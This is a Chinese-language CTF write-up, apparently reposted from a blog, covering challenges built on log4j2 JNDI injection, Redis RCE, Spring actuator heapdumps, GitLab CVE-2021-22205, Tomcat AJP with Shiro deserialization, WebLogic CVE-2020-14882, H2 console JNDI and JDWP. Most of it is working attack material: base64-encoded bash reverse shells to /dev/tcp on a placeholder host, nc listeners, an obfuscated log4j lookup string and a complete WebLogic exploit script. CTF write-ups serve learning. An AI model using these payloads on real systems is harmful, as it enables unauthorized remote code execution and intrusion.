log4flag
最近風靡全球的log4j2漏洞,加了一個正則過濾
用log4j自帶的語法便輕松繞過,然后常規jndi注入攻擊,需要一臺在公網的vps
在自己vps上使用工具搭建ldap服務
https://github.com/welk1n/JNDI-Injection-Exploit
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94LngueC54LzExMTExIDA+JjE=}|{base64,-d}|{bash,-i}" -A "x.x.x.x"
vps監聽彈回來的埠nc -lvnp 11111
用戶名填
${${lower:${lower:j}}${lower:${upper:n}}${lower:d}i:l${lower:d}ap://x.x.x.x:1389/rlirh2}
密碼隨便填 然后登錄

vps拿到shell
Be-a-Database-Hacker
redis 4.x及以上的主從復制RCE
可參考https://www.cnblogs.com/-chenxs/p/11185471.html
git clone https://github.com/Ridter/redis-rce.git
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
# 進入RedisModules-ExecuteCommand檔案的src檔案里面,看見makefile、module.c兩個檔案,進入該路徑的終端,執行命令make生成module.so檔案
# 將module.so檔案復制到redis-rce目錄下
python3 redis-rce.py -r 47.102.124.80 -p 38152 -L x.x.x.x -f module.so
拿到目標shell
the Secrets of Memory
spring boot actuator 存在未授權訪問
訪問/actuator/env

提示了資料庫密碼就是flag
訪問/actuator/heapdump下載泄漏的記憶體鏡像
下載 Eclipse Memory Analyzer 工具來分析
點紅色感嘆號輸入select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))進行搜索

找到flag
baby flaglab
目標存在CVE-2021-22205漏洞
git clone https://github.com/Al1ex/CVE-2021-22205.git
cd CVE-2021-22205
python3 CVE-2021-22205.py -a true -t http://47.102.106.96:36016/ -c "echo 'bash -i >& /dev/tcp/x.x.x.x/11111 0>&1' > /tmp/1.sh"
python3 CVE-2021-22205.py -a true -t http://47.102.106.96:36016/ -c "chmod +x /tmp/1.sh"
python3 CVE-2021-22205.py -a true -t http://47.102.106.96:36016/ -c "/bin/bash /tmp/1.sh"
成功獲取shell
Ghost Shiro
注意這次多給了個AJP埠

tomcat-ajp的本地檔案包含進行任意檔案讀取https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC
讀取shiro.ini
python poc.py -p 39801 -f WEB-INF/shiro.ini 139.224.194.110

拿到aes密鑰 ODN6dDZxNzh5ejB6YTRseg== 便可以在rememberMe進行反序列化攻擊
目標環境特殊,ysoserial的利用鏈都用不了
但p神對此情況已有分析
https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
也有大牛寫出了利用工具
https://github.com/dr0op/shiro-550-with-NoCC

Flag Console
目標存在CVE-2020-14882漏洞
#!/usr/bin/python3
# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request
# Exploit Author: Nguyen Jang
# CVE: CVE-2020-14882
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
if len(sys.argv) != 3:
print("[+] WebLogic Unauthenticated RCE via GET request")
print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
exit()
target = sys.argv[1]
command = sys.argv[2]
request = requests.session()
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}
print("[+] Sending GET Request ....")
GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)
print("[+] Done !!")
bash反彈shell失敗了,原因不明
用bash 196 反彈shell成功
python3 cve-2020-14882.py http://47.102.143.222:49530/ "bash -c {echo,MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC94LngueC54LzExMTExOyBiYXNoIDwmMTk2ID4mMTk2IDI+JjE5Ng==}|{base64,-d}|{bash,-i}"
vps拿到shell
Be-a-Database-Hacker 2
h2嵌入式資料庫的控制臺暴露,通過控制driver class和jdbc url可以進行jndi注入
vps開ldap服務https://github.com/welk1n/JNDI-Injection-Exploit
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94LngueC54LzExMTExIDA+JjE=}|{base64,-d}|{bash,-i}" -A "x.x.x.x"
監聽反彈shell埠nc -lvnp 11111
在控制臺進行注入

點擊測驗連接,拿到shell
Java Remote Debugger
JDWP 遠程命令執行漏洞
https://github.com/cash2one/jdwp-exec
python2 jdwp.py -t 139.196.23.201 -p 8888 --break-on "java.lang.String.indexof" --cmd "bash -c {echo,MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC94LngueC54LzExMTExOyBiYXNoIDwmMTk2ID4mMTk2IDI+JjE5Ng==}|{base64,-d}|{bash,-i}"

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/419928.html
標籤:其他
